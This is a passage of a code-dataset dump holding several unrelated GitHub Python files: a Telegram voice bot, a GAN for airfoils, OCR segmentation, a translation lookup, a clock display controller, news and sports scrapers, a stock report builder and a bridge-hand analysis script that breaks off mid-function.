print(f'Error downloading file. Status: {response.status}')\n\nclass Form(StatesGroup):\n voice = State()\n@form_router.message(Command(\"voiceChat\"))\nasync def command_start(message: types.message, state: FSMContext) -> None:\n await state.set_state(Form.voice)\n await message.answer('Бот перешел в состояние голосового чата')\n@form_router.message(Command(\"exit\"),Form.voice)\nasync def command_start(message: types.message, state: FSMContext) -> None:\n await state.clear()\n await message.answer('Вы вышли из режима VoiceChat')\n\n@form_router.message(Form.voice)\nasync def command_start(message: types.message, state: FSMContext) -> None:\n global context\n try:\n voice_message = message.voice\n await download_voice_message(voice_message)\n\n # user_input = translate(Recognition(),\"en\")\n #generated_text = generate_dialog(prompt=context + \" \" + user_input,\n # model=\"davinci\",\n #token_max_length=150)\n # context += \" \" + user_input + \" \" + generated_text\n #await message.answer(translate(generated_text,\"ru\"))\n await message.answer(Recognition())\n except:\n await message.answer('Это не голосовое! 
Выйдите из этого режима командой /exit чтобы общаться текстом')\nasync def main():\n bot = Bot(token=cfg.telegramAPI_TOKEN, parse_mode=\"HTML\")\n dp = Dispatcher()\n dp.include_router(form_router)\n\n await dp.start_polling(bot)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n asyncio.run(main())","repo_name":"NiXbi-L/OpenAI_dialog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35898587148","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 5 15:35:53 2022\r\n\r\n@author: Admin\r\n\r\nDescription:\r\nNew file to hold all of the functions for the GAN\r\nMakes main file more easily readable\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom numpy import zeros\r\nfrom numpy import ones\r\nfrom numpy import vstack\r\nfrom numpy import hstack\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Reshape\r\nfrom tensorflow.keras.layers import Flatten\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import Conv2DTranspose\r\nfrom tensorflow.keras.layers import ZeroPadding2D\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom tensorflow.keras.layers import Dropout\r\nfrom tensorflow_addons.layers import SpectralNormalization\r\nimport matplotlib.pyplot as plt\r\n\r\n#%% Define model function\r\n\r\ndef define_generator(latent_dim):\r\n model = Sequential()\r\n # foundation for 2x50 points\r\n N = 1024\r\n n_nodes = N * 2 * 25\r\n \r\n # Layer 1 - Dense nodes\r\n model.add(SpectralNormalization(Dense(n_nodes, input_dim=latent_dim)))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Reshape((2, 25, N)))\r\n \r\n # Layer 2 - Upsample from (2,25) --> (2,50)\r\n model.add(SpectralNormalization(Conv2DTranspose(N, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 3 - Upsample from (2,50) --> (2,100)\r\n model.add(SpectralNormalization(Conv2DTranspose(N/4, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 4 - Upsample from (2,100) --> (2,200)\r\n model.add(SpectralNormalization(Conv2DTranspose(N/16, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 5 - 1 filter looking all the points\r\n model.add(SpectralNormalization(Conv2D(1, (2,2), padding='same'))) \r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n model.trainable = True\r\n \r\n return model\r\n\r\n#%% Define discriminator\r\ndef define_discriminator(in_shape=(2,200,1)):\r\n model = Sequential()\r\n N = 256\r\n model.add(Conv2D(N, (2,4), strides=(2, 2), padding='same', input_shape=in_shape))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Dropout(0.4))\r\n model.add(Conv2D(N, (2,4), strides=(2, 2), padding='same'))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Dropout(0.4))\r\n model.add(Flatten())\r\n model.add(Dense(1, activation='sigmoid'))\r\n \r\n # compile model\r\n opt = Adam(learning_rate=0.0001, beta_1=0.5)\r\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n \r\n return model\r\n\r\n#%% create the combined model\r\ndef define_gan(g_model, d_model):\r\n # make weights in the discriminator untrainable\r\n d_model.trainable = False\r\n \r\n #connect them\r\n model = Sequential()\r\n 
model.add(g_model)\r\n model.add(d_model)\r\n \r\n # compile model\r\n opt = Adam(learning_rate=0.0001, beta_1=0.5)\r\n model.compile(loss='binary_crossentropy', optimizer=opt)\r\n \r\n return model\r\n\r\n#%% randomly select airfoils to be in real and fake dataset\r\ndef SplitDataset(AirfoilNum,batchSize,n_epochs,unrolling_steps):\r\n batchNum = int(AirfoilNum/batchSize)\r\n halfBatch = int(batchSize/2)\r\n batch = np.zeros([batchNum+unrolling_steps, batchSize, n_epochs])\r\n Num = np.array(list(range(0,AirfoilNum)))\r\n for b in range(0,n_epochs):\r\n np.random.shuffle(Num)\r\n AirfoilIDs = hstack((Num, np.random.randint(0,AirfoilNum-1,unrolling_steps*batchSize)))\r\n batch[:,:,b] = AirfoilIDs.reshape(batchNum+unrolling_steps,batchSize)\r\n \r\n real = batch[:,0:halfBatch,:]\r\n fake = batch[:,halfBatch:batchSize,:]\r\n\r\n return real.astype(int), fake.astype(int)\r\n\r\n#%% creating a dataset from MNIST images with class label as 1\r\ndef generate_real_samples(dataset, realSet):\r\n \r\n # choose random instances\r\n X = np.zeros([len(realSet), 2, 200,1])\r\n for r in range(len(realSet)):\r\n X[r, :, :,:] = dataset[realSet[r], :, :].reshape([1, 2, 200, 1])\r\n \r\n # generate 'real' class labels (1)\r\n y = ones((len(realSet), 1))\r\n return X, y\r\n\r\n#%% create input for Generator (generate points in latent space for G)\r\ndef generate_latent_points(dataset, fakeSet, dataNum):\r\n \r\n # generate points in the latent space\r\n x_input = np.zeros([len(fakeSet), dataNum])\r\n for f in range(len(fakeSet)):\r\n dataPoints = dataset[fakeSet[f], :]\r\n dataPoints = dataPoints.reshape(1,dataPoints.size)\r\n noise = (tf.random.normal([1,100])).numpy()\r\n x_input[f,:] = hstack((dataPoints,noise))\r\n \r\n return x_input\r\n\r\n#%% creating fake dataset for discriminator (use G to make fake examples)\r\ndef generate_fake_samples(g_model, dataset, fakeSet, dataNum): \r\n #generate points in latent space\r\n x_input = generate_latent_points(dataset, fakeSet, dataNum)\r\n \r\n #predict outputs\r\n X = g_model.predict(x_input)\r\n half_batch = int(len(fakeSet))\r\n \r\n # create 'fake' class labels (0)\r\n y = zeros((len(fakeSet), 1))\r\n return X.reshape([half_batch,2,200,1]), y\r\n\r\n#%% Training method GAN\r\ndef train(g_model, d_model, gan_model, C_data, P_data, dataNum, unrolling_steps, n_epochs=1000, n_batch=int(16)):\r\n \r\n #define batch per epoch and split dataset for all epochs\r\n bat_per_epo = int(C_data.shape[0]/n_batch)\r\n reals, fakes = SplitDataset(C_data.shape[0], n_batch, n_epochs, unrolling_steps)\r\n \r\n # Create a seed for plotting airfoil after each epoch\r\n inputData = hstack((P_data[0,:].reshape(1,100),(tf.random.normal([1,100])).numpy()))\r\n seed = tf.convert_to_tensor(inputData)\r\n \r\n #initialize arrays for loss\r\n d_loss = np.zeros([bat_per_epo,1]) # Loss throughout each epoch\r\n g_loss = np.zeros([bat_per_epo,1])\r\n g_lossLog = [] # Average loss for each epoch\r\n d_lossLog = []\r\n #initialize font for plots\r\n font2 = {'family' : 'Times New Roman','weight' : 'normal','size' : 14,}\r\n \r\n for i in range(n_epochs):\r\n for j in range(bat_per_epo):\r\n #unrolled training for discriminator\r\n for k in range(unrolling_steps):\r\n # create real and fake samples and then combine\r\n X_real, y_real = generate_real_samples(C_data, reals[j+k,:,i])\r\n X_fake, y_fake = generate_fake_samples(g_model, P_data, fakes[j+k,:,i], dataNum)\r\n X, y = vstack((X_real, X_fake)), vstack((y_real, y_fake))\r\n\r\n if k==0:# save weights \r\n d_loss[j], _ = 
d_model.train_on_batch(X, y)\r\n d_weights = d_model.get_weights()\r\n else:\r\n loss, _ = d_model.train_on_batch(X, y)\r\n \r\n # prepare points in latent space as input for the generator\r\n batch = np.concatenate((reals[j,:,i],fakes[j,:,i]))\r\n X_gan = generate_latent_points(P_data, batch, dataNum)\r\n y_gan = ones((n_batch, 1)) #invert fake sample label\r\n \r\n # update the generator via the discriminator's error\r\n g_loss[j] = gan_model.train_on_batch(X_gan, y_gan)\r\n \r\n #reset d_model weights back to one iteration of training\r\n d_model.set_weights(d_weights)\r\n \r\n \r\n '''\r\n # USED FOR OBSERVING SPIKES IN LOSS CURVE\r\n if i>=50:\r\n # Plot G prediction\r\n prediction = g_model(seed, training=False)\r\n plt.figure(figsize=(20,8))\r\n plt.plot(prediction[0,0,:,0],prediction[0,1,:,0])\r\n plt.xlim(0,1)\r\n plt.ylim(0.5,1.5)\r\n plt.grid(True)\r\n plt.xlabel('X axis (% chord)',font2)\r\n plt.ylabel('Y axis (% chord)',font2)\r\n plt.title('Epoch #'+str(i)+' Prediction',font2)\r\n plt.show()\r\n \r\n # Plot zoomed in version of the loss curve\r\n plt.figure(figsize=(20,8))\r\n plt.plot(range(i-50,i),g_lossLog[i-50:i],'r',label='Generator Loss')\r\n plt.plot(range(i-50,i),d_lossLog[i-50:i],'b',label='Discriminator Loss')\r\n plt.legend(loc=0)\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.title('Loss in Epochs '+str(i-50)+'-'+str(i))\r\n plt.show()\r\n \r\n \r\n if np.remainder(i+1,50)==1:\r\n SaveLoc = 'Models\\\\GANmodel_recent\\\\Model\\\\E'+str(i+1)\r\n g_model.build((None,1,200))\r\n g_model.save(SaveLoc)\r\n '''\r\n \r\n # summarize loss on this epoch\r\n if i==0:\r\n # setup for ouputs\r\n print(' Epoch | D loss avg | G loss avg')\r\n print('----------+------------+------------')\r\n \r\n DLavg = np.sum(d_loss)/bat_per_epo\r\n GLavg = np.sum(g_loss)/bat_per_epo\r\n print('{0:4d}/{1:4d} | {2:1.4f} | {3:1.4f}'.format(i+1,n_epochs,DLavg,GLavg))\r\n \r\n # record loss over epochs\r\n g_lossLog.append(GLavg)\r\n d_lossLog.append(DLavg)\r\n \r\n # plot the loss curve over epochs\r\n plt.figure(figsize=(10,4))\r\n plt.plot(range(0,i+1),g_lossLog,'r',label='Generator Loss')\r\n plt.plot(range(0,i+1),d_lossLog,'b',label='Discriminator Loss')\r\n plt.legend(loc=0)\r\n plt.xlabel('Epochs',font2)\r\n plt.ylabel('Loss',font2)\r\n plt.show()\r\n \r\n","repo_name":"EckleyZ/AirfoilGAN","sub_path":"GANfuncs_Iter5.py","file_name":"GANfuncs_Iter5.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"29173073227","text":"#https://www.pyimagesearch.com/2017/02/20/text-skew-correction-opencv-python/\r\nimport cv2\r\nimport numpy as np\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\ndef Flood(image, index, label, x, y, i):\r\n #The coordinate of first pixel is (x,y); The index of component is i\r\n (height, width)=image.shape[:2]\r\n list=[[x,y]]\r\n while (not list) == False:\r\n cx, cy = list.pop()\r\n index[cx, cy] = i\r\n label[cx, cy] = 1\r\n pixel = image[cx, cy]\r\n if cx - 1 >= 0 and index[cx - 1, cy] == 0 and image[cx - 1, cy] == pixel:\r\n list.append([cx - 1, cy])\r\n #Flood(image, index, x - 1, y, i, c, height, width)\r\n if cx + 1 < height and index[cx + 1, cy] == 0 and image[cx + 1, cy] == pixel:\r\n list.append([cx + 1, cy])\r\n #Flood(image, index, x + 1, y, i, c, height, width)\r\n if cy - 1 >= 0 and index[cx, cy - 1] == 0 and image[cx, cy - 1] == pixel:\r\n list.append([cx, cy - 1])\r\n #Flood(image, index, x, y - 1, i, c, height, width)\r\n if cy + 1 < width 
and index[cx, cy + 1] == 0 and image[cx, cy + 1] == pixel:\r\n list.append([cx, cy + 1])\r\n #Flood(image, index, x, y + 1, i, c, height, width)\r\n return index, label\r\n\r\ndef fourCornersSort(pts):\r\n \"\"\" Sort corners: top-left, bot-left, bot-right, top-right\r\n # Difference and sum of x and y value\r\n # Inspired by http://www.pyimagesearch.com\r\n diff = np.diff(pts, axis=1)\r\n summ = pts.sum(axis=1)\r\n\r\n # Top-left point has smallest sum...\r\n # np.argmin() returns INDEX of min\r\n return np.array([pts[np.argmin(summ)],\r\n pts[np.argmax(diff)],\r\n pts[np.argmax(summ)],\r\n pts[np.argmin(diff)]])\"\"\"\r\n max = np.max(pts, axis=0)\r\n min = np.min(pts, axis=0)\r\n topleft = np.array([min[0], min[1]])\r\n #topright = np.array([min[0], max[1]])\r\n #bottomleft = np.array([max[0], min[1]])\r\n bottomright = np.array([max[0], max[1]])\r\n return np.array([topleft,bottomright])\r\n\r\nif __name__ == '__main__':\r\n # Reading the input image\r\n img = cv2.imread('post_skew.png', 0)\r\n (h, w) = img.shape[:2]\r\n # Taking a matrix of size 5 as the kernel\r\n kernel = np.ones((5, 5), np.uint8)\r\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(img)\r\n\r\n # threshold the image, setting all foreground pixels to 255 and all background pixels to 0\r\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n img_dilation = cv2.dilate(thresh, kernel, iterations=10)\r\n blur = cv2.GaussianBlur(img_dilation, (5, 5), 0)\r\n thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n cv2.imwrite(\"binary_resultprojectivetrans.jpg\", thresh)\r\n\r\n #REQUIRE_GROUPING=img_dilation\r\n LABELED_OR_NOT=np.zeros([h,w])\r\n PIXEL_GROUP=np.zeros([h,w])\r\n\r\n\r\n #sum=0\r\n for i in range(h):\r\n for j in range(w):\r\n if thresh[i][j]==0:\r\n LABELED_OR_NOT[i][j] = 1\r\n #sum=sum+1\r\n\r\n\r\n num=0 #The index of component\r\n #while True:\r\n #r1 = np.int(np.random.random() * h) - 1\r\n #r2 = np.int(np.random.random() * w) - 1\r\n for r1 in range(h):\r\n for r2 in range(w):\r\n if LABELED_OR_NOT[r1][r2] == 0:\r\n print(r1,r2)\r\n num = num + 1\r\n print(num)\r\n PIXEL_GROUP, LABELED_OR_NOT=Flood(thresh, PIXEL_GROUP, LABELED_OR_NOT, r1, r2, num)\r\n\r\n\r\n '''\r\n cv2.namedWindow('Dilation', 0)\r\n cv2.imshow(\"Dilation\", img_dilation)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()'''\r\n list=[]\r\n point=[]\r\n for i in range(num):\r\n list.append([])\r\n point.append([])\r\n\r\n for i in range(h):\r\n for j in range(w):\r\n if PIXEL_GROUP[i][j] != 0:\r\n list[int(PIXEL_GROUP[i][j])-1].append([i,j])\r\n\r\n print(len(list))\r\n for i in range(num):\r\n point[i]=fourCornersSort(np.array(list[i]))\r\n\r\n\r\n cv2.imwrite(\"resultblock.jpg\", img)\r\n\r\n\r\n binary = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n rowsplit = []\r\n for i in range(num):\r\n rowsplit.append([])\r\n threshold = 240\r\n for s in range(num):\r\n rowflag = 1\r\n for i in range(point[s][0][0], point[s][1][0]):\r\n sum = 0\r\n count = point[s][1][1] - point[s][0][1]\r\n for j in range(point[s][0][1], point[s][1][1]):\r\n sum = sum + binary[i][j]\r\n print(sum / count)\r\n if sum / count > threshold and rowflag == 0:\r\n continue\r\n elif sum / count > threshold and rowflag == 1: # just get out of the block\r\n rowsplit[s].append(i)\r\n rowflag = 0\r\n cv2.line(img, (point[s][0][1], i), (point[s][1][1], i), (0, 0, 0), 1)\r\n continue\r\n elif sum / count <= threshold and rowflag == 0: # just get into the block\r\n 
rowsplit[s].append(i)\r\n rowflag = 1\r\n cv2.line(img, (point[s][0][1], i), (point[s][1][1], i), (0, 0, 0), 1)\r\n continue\r\n else:\r\n continue\r\n for i in range(num):\r\n cv2.rectangle(img, (tuple(point[i][0])[1], tuple(point[i][0])[0]),\r\n (tuple(point[i][1])[1], tuple(point[i][1])[0]), 3)\r\n\r\n cv2.imwrite(\"resultsplitpaper.jpg\", img)","repo_name":"yunjuanwang/OCR-character-detection","sub_path":"slant.py","file_name":"slant.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"30666916309","text":"# check py verion\n# check requests library\n# make query string\n\nimport json\nimport requests\nimport sys\n\nurl = \"http://fanyi.youdao.com/openapi.do\"\n\nconfigFile = \"config.json\"\ndef config(keyfrom,key):\n \"\"\"config key to config.json file\"\"\"\n payload = {\n \"keyfrom\":keyfrom,\n \"key\":key,\n \"type\":\"data\",\n \"doctype\":\"json\",\n \"version\":\"1.1\",\n }\n with open(configFile,\"w\") as cf:\n cf.write(json.dumps(payload))\n\n\ndef query(word):\n \"\"\"query word\"\"\"\n with open(configFile) as cf:\n payload = json.loads(cf.read())\n\t \n payload[\"q\"] = word\n resp = requests.get(url,params=payload)\n return resp.text\n# config(\"myiosworkflow\",\"884997728\")\n\ndef Query(word):\n\tpayload = {\n \"keyfrom\":\"myiosworkflow\",\n \"key\":\"884997728\",\n \"type\":\"data\",\n \"doctype\":\"json\",\n \"version\":\"1.1\",\n\t\t \"q\":word\n }\n\tresp = requests.get(url,params=payload)\n\tjsonObj = json.loads(resp.text)\n\treturn json.dumps(jsonObj,indent=4,ensure_ascii=False)\n\t#return resp.text\nprint(Query(sys.argv[1]))","repo_name":"sunliang711/alfredsync","sub_path":"Alfred.alfredpreferences/workflows/user.workflow.926FBC3E-D185-4154-9F58-FE9E02676ED8/yd.py","file_name":"yd.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1507036616","text":"class ClockController:\n def __init__(self, display):\n self._display = display\n self._state = ClockState(' ', ' ', ' ', ' ', colon=False)\n\n def update(self, digit0, digit1, digit2, digit3, colon=False):\n new_state = ClockState(digit0, digit1, digit2, digit3, colon)\n is_change = self._state.render_delta(new_state, self._display)\n self._state = new_state\n\n def get_state(self):\n return self._state\n\nclass ClockState:\n '''Treat this type as if it were immutable.'''\n def __init__(self, digit0, digit1, digit2, digit3, colon):\n # All values are taken from SevenSegment.DIGIT_VALUES.\n # Because we do not use decimal values, we do not store\n # a state for it.\n self.digit0 = digit0\n self.digit1 = digit1\n self.digit2 = digit2\n self.digit3 = digit3\n self.colon = colon\n\n def render_delta(self, new_state, display):\n is_change = False\n if self.digit0 != new_state.digit0:\n display.set_digit(0, new_state.digit0)\n is_change = True\n if self.digit1 != new_state.digit1:\n display.set_digit(1, new_state.digit1)\n is_change = True\n if self.digit2 != new_state.digit2:\n display.set_digit(2, new_state.digit2)\n is_change = True\n if self.digit3 != new_state.digit3:\n display.set_digit(3, new_state.digit3)\n is_change = True\n if self.colon != new_state.colon:\n display.set_colon(new_state.colon)\n is_change = True\n\n if is_change:\n display.write_display()\n return 
is_change\n","repo_name":"bolinfest/rpi-clock","sub_path":"src/segment7-service/ClockController.py","file_name":"ClockController.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18898588643","text":"import argparse\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport locale\nfrom pymongo import MongoClient\nimport requests\nimport time\nimport tqdm\nimport traceback\n\nfrom modules import common\n\nTOTAL_PAGES = 10\nPOSTS_PER_PAGE = 40\nDELAY = 0.5\n\n# Загружает список новостей\ndef load_news(page):\n url = f'https://vlg-media.ru/wp-admin/admin-ajax.php?posts_per_page={POSTS_PER_PAGE}&page={page}&offset=0&order=DESC&orderby=date&action=alm_get_posts'\n r = requests.get(url)\n return r.json()\n\n# Парсит список новостей\ndef parse_news_list(html):\n # Парсим HTML\n soup = BeautifulSoup(html, 'lxml')\n news_tags = soup.find_all('li', class_='alm-item')\n\n parsed_news = []\n\n # Проходим по всем новостям\n for news_tag in news_tags:\n\n # Находим элемементы в разметке новости\n link_tag = news_tag.find('a')\n date_tag = news_tag.find('p', class_='entry-meta')\n date = datetime.strptime(date_tag.text, '%d %B, %Y')\n url =link_tag['href']\n # Добавляем запись\n news_item = {\n '_id': url, # используем URL в качестве ID\n 'title': link_tag.text,\n 'url': url,\n 'date': date\n }\n parsed_news.append(news_item)\n\n return parsed_news\n\n# Получает список новостей\ndef get_news_list(page):\n json = load_news(page)\n html = json['html']\n news = parse_news_list(html)\n return news\n\n# Загружает страницу новости\ndef load_news_details(url):\n r = requests.get(url)\n return r.text\n\n# Парсит страницу новости\ndef parse_news_details(news, html):\n soup = BeautifulSoup(html, 'lxml')\n article_tag = soup.find('article')\n short_text_tag = article_tag.find('p', class_='uk-text-lead')\n text_tag = article_tag.find('div', class_='entry-content')\n\n # Текст разделен на несколько тегов
\n # Найдем все и соединим\n p_tags = text_tag.find_all('p')\n p_texts = [p.text for p in p_tags]\n text = ' '.join(p_texts)\n\n news['short_text'] = short_text_tag.text\n news['text'] = text\n\n# Получает дополнительную информацию о новости со страницы новости\ndef get_news_details(news):\n html = load_news_details(news['url'])\n parse_news_details(news, html)\n\n# Получает новости с заданной страницы\ndef get_news(page):\n news = get_news_list(page)\n for item in news:\n time.sleep(DELAY)\n get_news_details(item)\n\n return news\n\ndef insert_or_update(collection, news):\n for item in news:\n collection.update_one(\n {\"_id\": item['_id']},\n {'$set': item},\n upsert=True\n )\n\ndef main():\n # Устанавливаем русскую локаль для парсинга даты\n locale.setlocale(locale.LC_TIME, 'ru_RU.UTF-8')\n db = common.get_db()\n news_cl = db['news']\n\n for page in tqdm.tqdm(range(cfg.pages)):\n try:\n news = get_news(page)\n insert_or_update(news_cl, news)\n except:\n print(traceback.format_exc())\n\n\n# Парсинг аргументов командной строки\ndef parse_args():\n parser = argparse.ArgumentParser(description='Parse news from web site')\n parser.add_argument('-p', '--pages', type=int, default=TOTAL_PAGES,\n help='Number of pages to parse')\n\n return parser.parse_args()\n\nif __name__ == '__main__':\n cfg = parse_args()\n main()\n","repo_name":"baaazik/compling_kr","sub_path":"src/news_parser.py","file_name":"news_parser.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15450500912","text":"#!/usr/bin/env python3\n\nimport yfinance as yf\nimport os\nimport sys\nimport json\ninput_file = \"stocks.lst\"\noutput_file = \"report.csv\"\ndata_dir = \"./data\"\n\nif not os.path.exists(input_file):\n print(\"Input file %s not found\" % input_file)\n sys.exit(1)\n\n# Pull out interesting fields\nfields = [\n 'symbol',\n 'shortName',\n 'sector',\n 'industry',\n 'recommendationKey',\n 'currentPrice',\n 'shortRatio',\n 'fullTimeEmployees',\n 'marketCap',\n 'totalRevenue',\n 'revenueGrowth',\n 'ebitdaMargins',\n 'profitMargins',\n 'grossMargins',\n 'earningsGrowth',\n 'dividendYield',\n 'debtToEquity',\n 'forwardEps',\n 'trailingEps',\n 'forwardPE',\n 'pegRatio',\n]\n\n\nwith open(input_file, \"r\", encoding=\"utf-8\") as fh_tickers:\n with open(output_file, \"w\", encoding=\"utf-8\") as fh_report:\n # generate header\n record_line = ';'.join(fields)\n record_line += '\\n'\n fh_report.write(record_line)\n\n # loop through list of tickers\n while True:\n ticker = fh_tickers.readline().rstrip()\n if not ticker:\n break\n print(ticker)\n ticker_file = os.path.join(data_dir, '{0}.json'.format(ticker))\n if not os.path.exists(ticker_file):\n print(\"ticker data file not found: %s\" % ticker_file)\n print('Run \"./get_one.py {0}\" or \"./refresh-data.py\"'.format(ticker))\n continue\n\n # read and parse ticker data file\n json_data = open(ticker_file, \"r\", encoding=\"utf-8\").read()\n ticker_data = json.loads(json_data)\n\n # test data is valid\n if \"shortName\" not in ticker_data:\n print(\"data file is invalid and will be skipped (shortName not found): %s\" % ticker_file)\n continue\n\n # build record from fields\n record_list = []\n for field in fields:\n if field in ticker_data:\n record_list.append(str(ticker_data[field]))\n else:\n record_list.append(\"\")\n\n # write report line\n record_line = ';'.join(record_list)\n record_line += \"\\n\"\n 
fh_report.write(record_line)\n\n","repo_name":"msgarbossa/stock-research","sub_path":"create-csv.py","file_name":"create-csv.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31340374071","text":"from selenium.common.exceptions import NoSuchElementException\n\n\ndef scrape_team_row(driver, team_row):\n\tleague_position = f'{team_row}/td[2]/span[1]'\n\tteam_name = f'{team_row}/td[3]'\t\n\tplayed = f'{team_row}/td[4]'\n\twon = f'{team_row}/td[5]'\n\tdrawn = f'{team_row}/td[6]'\n\tlost = f'{team_row}/td[7]'\n\tgoals_for = f'{team_row}/td[8]'\n\tgoals_against = f'{team_row}/td[9]'\n\tgoal_difference = f'{team_row}/td[10]'\n\tpoints = f'{team_row}/td[11]'\n\t\n\telems = [league_position, team_name, played, won, drawn, lost, goals_for, goals_against, goal_difference, points]\n\t#data = []\n\t#for elem in elems:\n\t\t#data.append(driver.find_element_by_xpath(elem).text)\n\t\n\tdata = [driver.find_element_by_xpath(elem).text for elem in elems]\n\t\n\tstats = {\n\t\t'league_position': data[0],\n\t\t'team_name': data[1],\n\t\t'played': data[2],\n\t\t'won': data[3],\n\t\t'drawn': data[4],\n\t\t'lost': data[5],\n\t\t'goals_for': data[6],\n\t\t'goals_against': data[7],\n\t\t'goal_difference': data[8],\n\t\t'points': data[9],\n\t}\n\treturn stats\n\t\n\ndef gather_team_stats(driver):\n\tteam_results = []\n\tchecking = True\n\tx = 1\n\twhile checking:\n\t\ttry:\n\t\t\tteam_row = f'//*[@id=\"mainContent\"]/div/div[1]/div[3]/div/div/div/table/tbody/tr[{x}]'\n\t\t\t\t\t\t\n\t\t\tstats = scrape_team_row(driver, team_row)\n\t\t\tteam_results.append(stats)\n\t\t\tx += 2\n\t\texcept NoSuchElementException:\n\t\t\tchecking = False\n\treturn team_results\n","repo_name":"hartleyn/fb_scraper","sub_path":"pl_table_scraper.py","file_name":"pl_table_scraper.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29249528532","text":"class Solution:\n def numberOfPairs(self, nums: List[int]) -> List[int]:\n num_freq = Counter(nums)\n \n res = [0, 0]\n \n for v in num_freq.values():\n res[0] += (v // 2)\n res[1] += (v % 2)\n \n return res","repo_name":"shivaAcharya/LeetCode","sub_path":"2341-maximum-number-of-pairs-in-array/2341-maximum-number-of-pairs-in-array.py","file_name":"2341-maximum-number-of-pairs-in-array.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24844483939","text":"# vi:set sw=4 ts=4 expandtab:\n# -*- coding: utf8 -*-\n\nimport sys\n\nsys.path.insert(0, \"../../\")\n\nfrom sdk.api.group_message import GroupMessage\nfrom sdk.exceptions import CoolsmsException\n\n## @brief This sample code demonstrates how to send a group message through CoolSMS Rest API\nif __name__ == \"__main__\":\n\n # set api key, api secret\n api_key = \"#ENTER_YOUR_OWN#\"\n api_secret = \"#ENTER_YOUR_OWN#\"\n\n # group_id mandatory. 
must be filled\n group_id = \"GID57A82D462CBBF\" # Group ID\n\n cool = GroupMessage(api_key, api_secret)\n\n try:\n response = cool.send(group_id)\n print(\"Group ID : %s\" % response['group_id'])\n\n except CoolsmsException as e:\n print(\"Error Code : %s\" % e.code)\n print(\"Error Message : %s\" % e.msg)\n\n sys.exit()\n","repo_name":"coolsms/python-sdk","sub_path":"examples/group_message/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"26062932958","text":"import re, glob, os\nimport calendar\nfrom matplotlib import pyplot as plt\nfrom collections import Counter\nimport pandas as pd\n\nboard = r'[[]Board\\s+[\"](\\d+)[\"]'\ndeal = r'[[]Deal\\s+[\"][NESW]:(.*)[\"][]]'\ndoubleDummyTricks = r'[[]DoubleDummyTricks\\s+[\"](.*)[\"]'\npd.set_option('display.width', 1000)\n#pd.set_option('display.max_rows', 500)\n\ndef getData(FILENAME):\n try:\n with open(FILENAME, \"r\") as f:\n allLines = f.readlines()\n return allLines\n except IOError as e:\n print(e)\n\ndef extractData(data):\n results = []\n for d in data:\n result = re.search(f'{board}', d)\n if result:\n h = {}\n h['board'] = result.group(1)\n\n result = re.search(f'{deal}', d)\n if result: \n h['deal'] = result.group(1)\n \n result = re.search(f'{doubleDummyTricks}', d)\n if result: \n h['tricks'] = result.group(1)\n results.append(h)\n return results\n\ndef hasDoubleDummyAnalysis(fileName):\n data = getData(fileName)\n try:\n result = re.search(f'{doubleDummyTricks}', \", \".join(data))\n if result:\n if result.group(1) == \"00000000000000000000\": \n print(f\"*** error in file\", end=\", \")\n return False\n except Exception as e:\n print(e)\n return bool(result)\n\ndef computeTotalTricks(results):\n TNTricks = []\n for result in results:\n tricks = [int(c, 16) for c in result['tricks']]\n NS = [(n+s)/2 for n, s in zip(tricks[0:5], tricks[5:10])]\n EW = 